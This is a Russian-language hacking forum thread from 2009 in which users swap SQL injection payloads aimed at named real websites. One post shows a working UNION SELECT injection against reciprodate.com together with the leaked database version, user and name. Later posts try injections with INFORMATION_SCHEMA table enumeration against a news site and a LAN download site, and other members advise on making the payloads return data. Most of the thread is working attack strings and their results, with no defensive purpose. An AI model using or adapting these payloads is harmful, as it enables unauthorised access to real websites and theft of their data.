 |
|

11.01.2009, 23:16
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
http://www.reciprodate.com/home.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat_ws(0x7c,version(),user(),da tabase()),22,23,24,25/*
4.0.27-standard|reciprodate@localhost|reciprodate
|
|
|

12.01.2009, 03:11
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Мужики, а что можна с такой ошибкой сделать?
http://news.qs.kiev.ua/lenta/s.php?s=1'
|
|
|

12.01.2009, 04:41
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
тут вроде фильтрация стоит у меня ничё не прошло...
|
|
|

12.01.2009, 08:05
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
А такой вопрос.
Сайт в локалке у нас...есть скуль
Код:
http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх
|
|
|

12.01.2009, 08:09
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
С нами:
10306406
Репутация:
271
|
|
vakula
version() - за место 3его поля.
|
|
|

12.01.2009, 08:29
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Сообщение от a1ex
vakula
version() - за место 3его поля.
игнорирует, исходную показывает. а если ошибку сделаю или не в то поле...тогда показывает что ошибка.
|
|
|

12.01.2009, 08:30
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Сообщение от vakula
А такой вопрос.
Сайт в локалке у нас...есть скуль
Код:
http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх
1. Попробуй:
Код:
http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
2. Возможно, там просто нету вывода.
|
|
|

12.01.2009, 08:35
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Сообщение от R1dex
1. Попробуй:
Код:
http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
2. Возможно, там просто нету вывода.
пустота, а раньше показывало...убрали небось
p.s. дай линк где описывается поиск уязвимостей
спс
|
|
|

12.01.2009, 08:38
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
С нами:
10306406
Репутация:
271
|
|
Сообщение от vakula
пустота, а раньше показывало...убрали небось
p.s. дай линк где описывается поиск уязвимостей
спс
Скорее всего просто отключили вывод ошибок и нетолько,поэтому тебе невидно. 
|
|
|

12.01.2009, 08:42
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|